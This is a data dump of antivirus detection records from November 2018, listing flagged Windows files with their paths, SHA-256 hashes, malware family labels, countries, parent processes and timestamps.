  Row(detection=Row(filename='downloader-fuer-teamviewerportable.exe', filepath='H:\\04_Back-UP_Software\\Downloads\\Fernwartung\\Downloader-fuer-teamviewerportable.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='84e9759bd3634b175e08dd3679a8e792eb686382c30b4056794e0db8d3c19397', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\FreeFileSync\\Bin\\FreeFileSync_x64.exe', parentsize=11977720, timestamp='2018-11-02T12:18:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051120-b4809213', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051120-B4809213', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055455-cb220148', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055455-CB220148', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054359-43fb0142', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054359-43FB0142', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062248-b0a6145c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062248-B0A6145C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060231-dabeb605', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060231-DABEB605', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054806-d7405020', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054806-D7405020', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053259-bacb0da3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053259-BACB0DA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062310-bdb24934', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062310-BDB24934', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061528-aa4186fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061528-AA4186FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050652-14a747fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050652-14A747FA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060725-8a73f8c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060725-8A73F8C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062418-e5d33a73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062418-E5D33A73', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060302-ed64b498', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060302-ED64B498', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jul0413.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PAGI\\JUL0413\\JUL0413.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:07:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T00:42:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='quy dinh tiep nhan tin bao cua cax.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\Quy dinh tiep nhan tin bao cua CAX.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='1e7ebb456d8b1d0cfbb646f0374da6f987bf4c7b141db293d667c65aeabb09c0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.exe', filepath='\\\\?\\D:\\System Volume Information\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:39:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imjpuex.exe', filepath='D:\\Windows.old\\Windows\\System32\\IME\\IMEJP10\\IMJPUEX.EXE', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='18e4ba5868c74225a3927aa15c7c34d9a58107aa1e10517519f54fb6db6a0ab4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T05:37:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='19bd3265c77b38e8fc6c635284c5fd4447885686a141db52292d2236fc887461', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\19BD3265C77B38E8FC6C635284C5FD4447885686A141DB52292D2236FC887461', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='19bd3265c77b38e8fc6c635284c5fd4447885686a141db52292d2236fc887461', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:48:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160017-ecfd16e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160017-ECFD16E5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T22:43:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091747-0205ca10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_822e453a\\AVSCAN-20181101-091736-FFD256FF\\AVSCAN-20181101-091747-0205CA10', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:17:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201712-906d5c45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_375ce914\\AVSCAN-20181101-201653-8D5AF74D\\AVSCAN-20181101-201712-906D5C45', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='445f7a3bd3b5611edb93888be49641fd4c6c02d9f9e2b90bb6c761f773ab4a3a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:17:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:20:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='328aa382169f70a78fbf7ead02e6c8d34d6eb1025102902ec627f1f23717eded', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\328AA382169F70A78FBF7EAD02E6C8D34D6EB1025102902EC627F1F23717EDED', filesize=1008000, name='TR/Crypt.XPACK.Gen.#M300.#R3455'), hash='328aa382169f70a78fbf7ead02e6c8d34d6eb1025102902ec627f1f23717eded', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:59:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T10:43:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-01-00-47-50.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-26T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-01T06:27:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155855-df4965e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155855-DF4965E4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fav3.exe', filepath='D:\\Fav3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2432763\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\slitherio (4).exe', parentsize=2400760, timestamp='2018-11-01T17:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:12:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211330-99d145c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2813e991\\AVSCAN-20181101-210309-4A87528B\\AVSCAN-20181101-211330-99D145C7', filesize=4224000, name='TR/Crypt.XPACK.4b9649.#M1.#R1'), hash='4b9649599b166bba67531268a0cae54782872bb99d4c77eb8486d440770a8412', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:13:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:00:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\新しいフォルダー\\Pixologic ZBrush 4R8 P2 (x64) + Crack - [CrackzSoft]\\Update\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-01T08:08:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='de2c6e5996e7bba38d8982a24a402f679ead19c3', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\de2c6e5996e7bba38d8982a24a402f679ead19c3', filesize=3136000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='da717e539acaac5b08ca3dea96905a4499e6d6cc4d603822a468deb9b78acafb', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:46:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='015 - silent scream [lost and found].exe', filepath='E:\\music\\music\\Vampires 652 P\\015 - SILENT SCREAM [LOST AND FOUND]\\015 - SILENT SCREAM [LOST AND FOUND].exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='557536325e83b68d5f802408c6902fb34bc0a420ec5a053faffaeb5962f9dfeb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:13:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110649-db224079', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110649-DB224079', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:06:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='em000_32.dll', filepath='D:\\Archivos de programa\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b8.estimate.patch.exe', filepath='c:\\program files\\bazissoft\\bazis 8\\b8.estimate.patch.exe', filesize=64000, name='SPR/Tool.Keygen.8710.#M1.#R1'), hash='59a14c8f321bd15f3ac30fd45c5aee26e3bbdf59512195a36e679605476fcd04', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T23:10:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111152-01622f4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111152-01622F4D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215131-24478cb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3856b854\\AVSCAN-20181101-215115-2132098C\\AVSCAN-20181101-215131-24478CB9', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:51:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:32:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233700-2a27e5a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_09479a50\\AVSCAN-20181101-232059-A9CB4FEB\\AVSCAN-20181101-233700-2A27E5A6', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='b1bbffbe641df1b785b36a08b3098eff6e8615d77fefa8f1e9559a483cf29d9c', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:36:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d602359dc1a7ada64cd0d469eb7986efbc275e43ed24a03b0ce3500918bee825', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-18\\D602359DC1A7ADA64CD0D469EB7986EFBC275E43ED24A03B0CE3500918BEE825', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d602359dc1a7ada64cd0d469eb7986efbc275e43ed24a03b0ce3500918bee825', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:22:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143314-7c18030d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4d02a582\\AVSCAN-20181101-143250-786AD0A8\\AVSCAN-20181101-143314-7C18030D', filesize=2288000, name='PUA/InstallCore.#M1.#R1'), hash='916a157ec6c89876731b18b26138e9b8229a9a97811a8d572c5b4805aaee88c6', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:33:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125047-50b6f758', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-125025-3DB8672E\\AVSCAN-20181101-125047-50B6F758', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:50:48Z'), dt=datetime.date(2018, 11, 1)),
